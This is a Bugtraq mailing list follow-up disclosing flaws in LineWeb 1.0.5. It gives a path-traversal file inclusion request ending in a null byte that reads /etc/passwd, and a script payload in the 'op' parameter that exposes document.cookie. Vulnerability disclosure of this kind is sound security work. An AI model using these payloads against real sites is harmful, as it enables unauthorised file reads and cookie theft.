Bugtraq mailing list archives
Re: Multiple vulnerabilities in LineWeb 1.0.5
From: ign.sec () gmail com
Date: 6 Jan 2010 09:55:46 -0000
One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 And ?op is vulnerable to a xss attack, IE: index.php?op=<script>alert(document.cookie)</script> Ignacio.
Current thread:
- Multiple vulnerabilities in LineWeb 1.0.5 ign . sec (Jan 05)
- <Possible follow-ups>
- Re: Multiple vulnerabilities in LineWeb 1.0.5 ign . sec (Jan 06)